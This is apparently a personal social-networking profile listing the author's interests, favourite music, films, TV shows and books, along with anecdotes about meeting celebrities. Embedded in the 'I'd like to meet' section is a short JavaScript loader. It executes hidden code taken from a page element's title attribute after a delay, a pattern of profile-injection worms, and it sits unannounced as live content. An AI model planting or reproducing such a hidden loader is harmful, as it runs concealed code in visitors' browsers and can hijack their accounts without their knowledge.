My Interests

Nature; music; art; and forensics (CSI)

I'd like to meet:

Sapho - the original gay poet (isles of Lesbo); Katharine Hepburn; Paul Newman; Laurence Olivier; Barbra Streisand; Clea Koff. In general, I'd like to meet others with similar interests who want to explore the gay experience in fiction, non-fiction and poetry. .."var dv=document.getElementById('usrn');if(dv)setTimeout(unescape (dv.title),900);"

Music:

I love music - Sheryl Crow, The Corrs, kd Lang, Sarah McLachlan, The Beatles, ELO, Whitney Houston, Barbra Streisand, Train, Gordon Lightfoot, just to name a few.

Movies:

Drama; Comedy; Sci Fi; documentries. There are certain actors/actresses that I will automatically have me watch their movies: Denzel Washington, Emma Thompson, Halley Berry, Bruce Willis, Pierce Brosnan, Tom Selleck, Sharon Stone, Robert DeNero, Jane Fonda...the list goes on.I'm a real fan of the older movies - from the 40s especially. I wrote two letters to Katharine Hepburn years ago and actually got two replies on her personal stationary. That was way cool.I've met a few famous people - Eric Lindros, the Canadian skater; Kevin Smith, the actor who played Ares on Xena: Warrior Princess; the whole Winnipeg Jets team. The team was disbanded in the 90s I think but they were a great bunch of guys. They visited my daughter when she was in hospital. That was amazing!Current movies: Brokeback Mountain, Nanny McPhee, 8 Below, Goodnight and Good Luck, North Country, 16 Blocks.

CSI (all expt Miami); National Geographic; Cold Case; Boston Legal; Medium

The Bone Collector, by Jeffrey Deaver; Jurassic Park, by Michael Crichton; True Colours, by Nann Dunne; anything by Wilbur Smith, Robert Ludlum, Michael Crichton, Clea Koff, just to name a few. I love reading biographies and autobiographies as well.
